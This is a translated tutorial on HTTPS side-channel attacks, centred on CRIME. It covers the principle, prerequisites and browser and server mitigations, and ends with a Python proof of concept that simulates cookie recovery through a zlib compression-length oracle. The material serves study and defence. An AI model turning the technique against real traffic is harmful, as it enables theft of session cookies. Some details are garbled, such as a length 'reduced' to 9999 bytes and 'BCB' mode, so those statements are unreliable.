Common HTTPS attack methods (1)

Common HTTPS attack methods (1)

0x00 background

Study common https attack methods

Beast crime breach, and puts forward some suggestions for secure deployment of https Based on https features.

HTTPS attacks are mostly used in man-in-the-middle attacks. They are mainly used to perform side-channel-attack Based on the compression algorithm used by HTTPS and the CBC encryption mode. The prerequisites for these attacks are harsh, and the victim host must submit many requests to collect sufficient information to decrypt key data.

Common attack methods include BEAST, Lucky-13, RC4 Biases, CRIME, TIME, and BREACH. This section mainly introduces several of them.

0x01 CRIME

Compression Ratio Info-leak Made Easy

Attack principles

Attackers control the victim to send a large number of requests, use the compression algorithm to guess the key information in the request, and determine whether the request is successful based on the response length.

The following is the https header, which can be controlled by the get request address and Cookie. Then, the attacker only needs to constantly change the guess string at the GET address to guess.

GET /sessionid=a HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) 
Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924
GET /sessionid=a HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924

For example, the Response length is 1000 bytes.

GET /sessionid=d HTTP/1.1
Host: bank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0)
Gecko/20100101 Firefox/16.0
Cookie: sessionid=d3b0c44298fc1c149afbf4c8996fb924

When an attacker guesses the first letter of the cookie, the Response length will be reduced to 9999 bytes.

After the Response is encrypted by SSL, if the RC4 encryption mode is used, the length does not change randomly. When the BCB encryption mode is used, the length may slightly change due to padding.

Affected encryption algorithms

Deflate = LZ77 + HuffManGZip = Headers + Data Compressed using Deflate

Attack prerequisites

Attackers can obtain the victim's network communication package. (Man-in-the-middle attack, ISP supplier)

Browsers and servers support and use compression algorithms.

Attacks can control the victim to send a large number of requests and control the request content.

Defense methods

The client can upgrade the browser to avoid such attacks.

▪ Chrome: 21.0.1180.89 and above
▪ Firefox: 15.0.1 and above
▪ Opera: 12.01 and above
▪ Safari: 5.1.7 and above

The server can disable encryption algorithms to prevent such attacks.

Apache• SSLCompression flag = “SSLCompression off”• GnuTLSPriorities flag = “!COMP-DEFLATE"

Prohibit requests that are too frequent.

Modify the compression algorithm flow. user input data is not compressed.

Randomly add undefined junk data.

TLS 1.0.
SPDY protocol (Google).
Applications that uses TLS compression.
Mozilla Firefox (older versions) that support SPDY.
Google Chrome (older versions) that supported both TLS and SPDY.

POC

This poc does not simulate man-in-the-middle attacks in real environments, but verifies the feasibility of the attacks by using CRIME in python.

 
 

  
  
import string  
  
  
import zlib  
  
  
import sys  
  
  
import random  
  
  
    
  
  
charset = string.letters + string.digits  
  
  
    
  
  
COOKIE = ''.join(random.choice(charset) for x in range(30))  
  
  
    
  
  
HEADERS = ("POST / HTTP/1.1\r\n" 
  
  
           "Host: thebankserver.com\r\n" 
  
  
           "Connection: keep-alive\r\n" 
  
  
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" 
  
  
           "Accept: */*\r\n" 
  
  
           "Referer: https://thebankserver.com/\r\n" 
  
  
           "Cookie: secret="+COOKIE+"\r\n" 
  
  
           "Accept-Encoding: gzip,deflate,sdch\r\n" 
  
  
           "Accept-Language: en-US,en;q=0.8\r\n" 
  
  
           "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n" 
  
  
           "\r\n")  
  
  
BODY =    ("POST / HTTP/1.1\r\n" 
  
  
           "Host: thebankserver.com\r\n" 
  
  
           "Connection: keep-alive\r\n" 
  
  
           "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1\r\n" 
  
  
           "Accept: */*\r\n" 
  
  
           "Referer: https://thebankserver.com/\r\n" 
  
  
           "Cookie: secret=")  
  
  
cookie = ""  
  
  
    
  
  
def compress(data):  
  
  
    
  
  
    c = zlib.compressobj()  
  
  
    return c.compress(data) + c.flush(zlib.Z_SYNC_FLUSH)  
  
  
def getposset(perchar,chars):  
  
  
    posset = []  
  
  
    baselen = len(compress(HEADERS+perchar))  
  
  
    for i in chars:  
  
  
        t = len(compress(HEADERS+ perchar+i))  
  
  
        if (t<=baselen):  
  
  
            posset += i  
  
  
    return posset  
  
  
def doguess():  
  
  
    global cookie  
  
  
    while len(cookie)<30:  
  
  
        posset = getposset(BODY+cookie,charset)  
  
  
        trun = 1 
  
  
        tem_posset = posset  
  
  
        while 1<len(posset):  
  
  
            tem_body = BODY[trun:]  
  
  
            posset = getposset(tem_body+cookie,tem_posset)  
  
  
            trun = trun +1 
  
  
        if len(posset)==0:  
  
  
            return False 
  
  
        cookie += posset[0]  
  
  
        print posset[0]  
  
  
        return True 
  
  
    
  
  
while BODY.find("\r\n")>=0:  
  
  
    if not doguess():  
  
  
        print "(-)Changebody" 
  
  
        BODY = BODY[BODY.find("\r\n") + 2:]  
  
  
print "(+)orign  cookie"+COOKIE  
  
  
print "(+)Gotten cookie"+cookie